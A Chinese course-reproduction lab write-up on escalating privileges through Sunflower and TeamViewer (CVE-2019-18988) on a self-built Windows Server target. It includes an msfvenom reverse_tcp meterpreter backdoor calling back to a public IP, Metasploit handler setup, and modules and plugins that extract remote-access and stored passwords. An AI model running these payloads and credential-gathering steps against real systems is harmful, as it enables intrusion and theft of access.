文章内容复现于小迪安全相关课程
电脑(服务器)装的第三方应用越多,安全隐患越大
远控类
利用向日葵漏洞提权 漏洞版本百度云链接
搭建:
为追求真实服务器环境,采用阿里云ECS弹性服务器搭建靶场(windows server2012 + phpstudy)
背景:
已有webshell权限,利用探针(查看端口,进程等)知道服务器安装了向日葵服务
tasklist /svc
![](https://i-blog.csdnimg.cn/blog_migrate/8d81823442a3a44d9e81665b414ef85f.png)
提权工具-CS
![](https://i-blog.csdnimg.cn/blog_migrate/934eb97714e154b267b823c24dc934b6.png)
上传后门,会连会话,这里由于搭建原因忽悠是administrator权限,当做是普通用户权限,且无法正常提权至系统权限
利用CS插件上传向日葵提权工具
![](https://i-blog.csdnimg.cn/blog_migrate/3ebf52cf5439e1f477527f352edc563a.png)
上传
![](https://i-blog.csdnimg.cn/blog_migrate/15847d4207776449904bf7c579a4af8c.png)
执行
![](https://i-blog.csdnimg.cn/blog_migrate/2a2b0a075ddfaadb037cee69ae4f2cd5.png)
机器密文就是验证码,使用Python高版本(大于3.8)执行解谜脚本Sunflower_get_Password-main进行解密。百度云链接
![](https://i-blog.csdnimg.cn/blog_migrate/0214775734abf9697d0964105cae8f42.png)
接下来可以使用向日葵远控软件直接连接靶机
teamviewer提权(CVE-2019-18988) 漏洞版本百度云链接
后门上线权限必须是管理员权限,低权限用户不能获取
使用msf模块获取id与密码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.130.42 LPORT=3333 -f exe -o msf.exe #生成后门
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run
![](https://i-blog.csdnimg.cn/blog_migrate/f0ff280f3bb5fdbe4dc2e209b0a64a65.png)
run post/windows/gather/credentials/teamviewer_passwords
![](https://i-blog.csdnimg.cn/blog_migrate/2273a7d0aade89710722a84e0d85b01a.png)
使用cs插件获取id与密码
![](https://i-blog.csdnimg.cn/blog_migrate/e0e196e46d6a511f9fc950934e05f80d.png)
密码类
各大浏览器 Xshell Navicat 3389 等
![](https://i-blog.csdnimg.cn/blog_migrate/213e84c8a6a1a71fac58ed0ea8302520.png)
主要是使用cs插件直接进行提取,获取到相关密码
服务类
FileZilla Serv-u(漏洞太老了,已经淘汰了) Zend等
后续再补……